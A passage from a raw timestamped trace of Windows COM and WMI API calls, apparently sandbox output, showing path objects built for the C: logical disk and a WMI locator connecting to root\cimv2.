[6]=0xfa, [7]=0x25)), ppvObject=0x6c0f45c | out: ppvObject=0x6c0f45c*=0x0) returned 0x80004002 [0200.844] IUnknown:Release (This=0xb51e34) returned 0x1 [0200.845] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0edc8 | out: ppv=0x6c0edc8*=0x60271e0) returned 0x0 [0200.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0efe0 | out: ppvObject=0x6c0efe0*=0x0) returned 0x80004002 [0200.845] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eff4 | out: ppvObject=0x6c0eff4*=0x6030b00) returned 0x0 [0200.845] WbemDefPath:IUnknown:Release (This=0x60271e0) returned 0x0 [0200.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec14 | out: ppvObject=0x6c0ec14*=0x6030b00) returned 0x0 [0200.845] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ebd0 | out: ppvObject=0x6c0ebd0*=0x0) returned 0x80004002 [0200.846] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0200.846] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e52c | out: ppvObject=0x6c0e52c*=0x0) returned 0x80004002 [0200.846] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e4dc | out: ppvObject=0x6c0e4dc*=0x0) returned 0x80004002 [0200.846] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e4e8 | out: ppvObject=0x6c0e4e8*=0xbe2590) returned 0x0 [0200.846] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe2590, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e4f0 | out: pCid=0x6c0e4f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.846] WbemDefPath:IUnknown:Release (This=0xbe2590) returned 0x3 [0200.846] CoGetContextToken (in: pToken=0x6c0e548 | out: pToken=0x6c0e548) returned 0x0 [0200.846] CoGetContextToken (in: pToken=0x6c0e950 | out: pToken=0x6c0e950) returned 0x0 [0200.846] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e9e0 | out: ppvObject=0x6c0e9e0*=0x0) returned 0x80004002 [0200.846] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0200.846] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x1 [0200.846] CoGetContextToken (in: pToken=0x6c0f2d8 | out: pToken=0x6c0f2d8) returned 0x0 [0200.846] CoGetContextToken (in: pToken=0x6c0f238 | out: pToken=0x6c0f238) returned 0x0 [0200.846] WbemDefPath:IUnknown:QueryInterface (in: This=0x6030b00, riid=0x6c0f308*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f304 | out: ppvObject=0x6c0f304*=0x6030b00) returned 0x0 [0200.846] WbemDefPath:IUnknown:AddRef (This=0x6030b00) returned 0x3 [0200.846] WbemDefPath:IUnknown:Release (This=0x6030b00) returned 0x2 [0200.846] WbemDefPath:IWbemPath:SetText (This=0x6030b00, uMode=0x4, pszPath="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f488*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f488*=0x20, pszText=0x0) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetText (in: This=0x6030b00, lFlags=2, puBuffLength=0x6c0f488*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6c0f488*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6c0f48c | out: puCount=0x6c0f48c*=0x0) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetInfo (in: This=0x6030b00, uRequestedInfo=0x0, puResponse=0x6c0f494 | out: puResponse=0x6c0f494*=0xc19) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6030b00, puCount=0x6c0f40c | out: puCount=0x6c0f40c*=0x0) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60109c0, puCount=0x6c0f3f8 | out: puCount=0x6c0f3f8*=0x2) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3f4*=0xf, pszText=0x0) returned 0x0 [0200.846] WbemDefPath:IWbemPath:GetText (in: This=0x60109c0, lFlags=4, puBuffLength=0x6c0f3f4*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3f4*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.846] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3a8 | out: ppv=0x6c0f3a8*=0xb51e34) returned 0x0 [0200.847] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3a0 | out: pAptType=0x6c0f3a0*=1) returned 0x0 [0200.847] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3a4 | out: ppvObject=0x6c0f3a4*=0x0) returned 0x80004002 [0200.847] IUnknown:Release (This=0xb51e34) returned 0x1 [0200.847] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0ed10 | out: ppv=0x6c0ed10*=0x60271c0) returned 0x0 [0200.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x60271c0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0ef28 | out: ppvObject=0x6c0ef28*=0x0) returned 0x80004002 [0200.847] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60271c0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ef3c | out: ppvObject=0x6c0ef3c*=0x60305c0) returned 0x0 [0200.847] WbemDefPath:IUnknown:Release (This=0x60271c0) returned 0x0 [0200.847] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb5c | out: ppvObject=0x6c0eb5c*=0x60305c0) returned 0x0 [0200.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0eb18 | out: ppvObject=0x6c0eb18*=0x0) returned 0x80004002 [0200.848] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0200.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e474 | out: ppvObject=0x6c0e474*=0x0) returned 0x80004002 [0200.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e424 | out: ppvObject=0x6c0e424*=0x0) returned 0x80004002 [0200.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e430 | out: ppvObject=0x6c0e430*=0xbe24f0) returned 0x0 [0200.848] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbe24f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e438 | out: pCid=0x6c0e438*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.848] WbemDefPath:IUnknown:Release (This=0xbe24f0) returned 0x3 [0200.848] CoGetContextToken (in: pToken=0x6c0e490 | out: pToken=0x6c0e490) returned 0x0 [0200.848] CoGetContextToken (in: pToken=0x6c0e898 | out: pToken=0x6c0e898) returned 0x0 [0200.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e928 | out: ppvObject=0x6c0e928*=0x0) returned 0x80004002 [0200.848] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0200.848] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x1 [0200.848] CoGetContextToken (in: pToken=0x6c0f220 | out: pToken=0x6c0f220) returned 0x0 [0200.848] CoGetContextToken (in: pToken=0x6c0f180 | out: pToken=0x6c0f180) returned 0x0 [0200.848] WbemDefPath:IUnknown:QueryInterface (in: This=0x60305c0, riid=0x6c0f250*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6c0f24c | out: ppvObject=0x6c0f24c*=0x60305c0) returned 0x0 [0200.848] WbemDefPath:IUnknown:AddRef (This=0x60305c0) returned 0x3 [0200.848] WbemDefPath:IUnknown:Release (This=0x60305c0) returned 0x2 [0200.848] WbemDefPath:IWbemPath:SetText (This=0x60305c0, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0200.848] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6c0f3d0 | out: puCount=0x6c0f3d0*=0x2) returned 0x0 [0200.848] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6c0f3cc*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3cc*=0xf, pszText=0x0) returned 0x0 [0200.848] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=4, puBuffLength=0x6c0f3cc*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3cc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.848] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0f3d0 | out: ppv=0x6c0f3d0*=0xb51e34) returned 0x0 [0200.848] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6c0f3c8 | out: pAptType=0x6c0f3c8*=1) returned 0x0 [0200.848] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6c0f3cc | out: ppvObject=0x6c0f3cc*=0x0) returned 0x80004002 [0200.848] IUnknown:Release (This=0xb51e34) returned 0x1 [0200.849] CoGetClassObject (in: rclsid=0xb59574*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6c0eff0 | out: ppv=0x6c0eff0*=0x6023d20) returned 0x0 [0200.849] WbemLocator:IUnknown:QueryInterface (in: This=0x6023d20, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0f208 | out: ppvObject=0x6c0f208*=0x0) returned 0x80004002 [0200.849] WbemLocator:IClassFactory:CreateInstance (in: This=0x6023d20, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f21c | out: ppvObject=0x6c0f21c*=0x60271f0) returned 0x0 [0200.849] WbemLocator:IUnknown:Release (This=0x6023d20) returned 0x0 [0200.849] WbemLocator:IUnknown:QueryInterface (in: This=0x60271f0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ee3c | out: ppvObject=0x6c0ee3c*=0x60271f0) returned 0x0 [0200.849] WbemLocator:IUnknown:QueryInterface (in: This=0x60271f0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0edf8 | out: ppvObject=0x6c0edf8*=0x0) returned 0x80004002 [0200.849] WbemLocator:IUnknown:AddRef (This=0x60271f0) returned 0x3 [0200.849] WbemLocator:IUnknown:QueryInterface (in: This=0x60271f0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e754 | out: ppvObject=0x6c0e754*=0x0) returned 0x80004002 [0200.849] WbemLocator:IUnknown:QueryInterface (in: This=0x60271f0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e704 | out: ppvObject=0x6c0e704*=0x0) returned 0x80004002 [0200.849] WbemLocator:IUnknown:QueryInterface (in: This=0x60271f0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e710 | out: ppvObject=0x6c0e710*=0x0) returned 0x80004002 [0200.849] CoGetContextToken (in: pToken=0x6c0e770 | out: pToken=0x6c0e770) returned 0x0 [0200.850] CoGetContextToken (in: pToken=0x6c0eb78 | out: pToken=0x6c0eb78) returned 0x0 [0200.850] WbemLocator:IUnknown:QueryInterface (in: This=0x60271f0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0ec08 | out: ppvObject=0x6c0ec08*=0x0) returned 0x80004002 [0200.850] WbemLocator:IUnknown:Release (This=0x60271f0) returned 0x2 [0200.850] WbemLocator:IUnknown:Release (This=0x60271f0) returned 0x1 [0200.850] CoGetContextToken (in: pToken=0x6c0f1e8 | out: pToken=0x6c0f1e8) returned 0x0 [0200.850] CoGetContextToken (in: pToken=0x6c0f148 | out: pToken=0x6c0f148) returned 0x0 [0200.850] WbemLocator:IUnknown:QueryInterface (in: This=0x60271f0, riid=0x6c0f218*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6c0f214 | out: ppvObject=0x6c0f214*=0x60271f0) returned 0x0 [0200.850] WbemLocator:IUnknown:AddRef (This=0x60271f0) returned 0x3 [0200.850] WbemLocator:IUnknown:Release (This=0x60271f0) returned 0x2 [0200.850] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60305c0, puCount=0x6c0f3ac | out: puCount=0x6c0f3ac*=0x2) returned 0x0 [0200.850] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x6c0f3a8*=0x0, pszText=0x0 | out: puBuffLength=0x6c0f3a8*=0xf, pszText=0x0) returned 0x0 [0200.850] WbemDefPath:IWbemPath:GetText (in: This=0x60305c0, lFlags=8, puBuffLength=0x6c0f3a8*=0xf, pszText="00000000000000" | out: puBuffLength=0x6c0f3a8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0200.850] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x6c0f284 | out: ppv=0x6c0f284*=0x6027200) returned 0x0 [0200.850] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6027200, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x6c0f318 | out: ppNamespace=0x6c0f318*=0x6033584) returned 0x0 [0200.873] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1b4 | out: ppvObject=0x6c0f1b4*=0xb5b404) returned 0x0 [0200.873] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5b404, pProxy=0x6033584, pAuthnSvc=0x6c0f204, pAuthzSvc=0x6c0f200, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc, pImpLevel=0x6c0f1ec, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4 | out: pAuthnSvc=0x6c0f204*=0xa, pAuthzSvc=0x6c0f200*=0x0, pServerPrincName=0x6c0f1f8, pAuthnLevel=0x6c0f1fc*=0x6, pImpLevel=0x6c0f1ec*=0x2, pAuthInfo=0x6c0f1f0, pCapabilites=0x6c0f1f4*=0x1) returned 0x0 [0200.873] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x1 [0200.873] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a8 | out: ppvObject=0x6c0f1a8*=0xb5b424) returned 0x0 [0200.873] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0f1a4 | out: ppvObject=0x6c0f1a4*=0xb5b404) returned 0x0 [0200.874] WbemLocator:IClientSecurity:SetBlanket (This=0xb5b404, pProxy=0x6033584, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0200.874] WbemLocator:IUnknown:Release (This=0xb5b404) returned 0x2 [0200.874] WbemLocator:IUnknown:Release (This=0xb5b424) returned 0x1 [0200.874] CoTaskMemFree (pv=0xbd4918) [0200.874] WbemLocator:IUnknown:Release (This=0x6027200) returned 0x0 [0200.874] WbemLocator:IUnknown:QueryInterface (in: This=0x6033584, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eda4 | out: ppvObject=0x6c0eda4*=0xb5b424) returned 0x0 [0200.874] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6c0ed60 | out: ppvObject=0x6c0ed60*=0x0) returned 0x80004002 [0200.874] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6c0eb7c | out: ppvObject=0x6c0eb7c*=0x0) returned 0x80004002 [0200.874] WbemLocator:IUnknown:AddRef (This=0xb5b424) returned 0x3 [0200.875] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6c0e6bc | out: ppvObject=0x6c0e6bc*=0x0) returned 0x80004002 [0200.875] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6c0e66c | out: ppvObject=0x6c0e66c*=0x0) returned 0x80004002 [0200.875] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0e678 | out: ppvObject=0x6c0e678*=0xb5b384) returned 0x0 [0200.875] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5b384, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6c0e680 | out: pCid=0x6c0e680*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0200.875] WbemLocator:IUnknown:Release (This=0xb5b384) returned 0x3 [0200.875] CoGetContextToken (in: pToken=0x6c0e6d8 | out: pToken=0x6c0e6d8) returned 0x0 [0200.875] CoGetContextToken (in: pToken=0x6c0eae0 | out: pToken=0x6c0eae0) returned 0x0 [0200.875] WbemLocator:IUnknown:QueryInterface (in: This=0xb5b424, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6c0eb70 | out: ppvObject=0x6c0eb70*=0xb5b40c) returned 0x0 [0200.875] WbemLocator:IRpcOptions:Query (in: This=0xb5b40c, pPrx=0xb5b424, dwProperty=2, pdwValue=0x6c0eb98 | out: pdwValue=0x6c0eb98) returned 0x80004002 [0200.875] 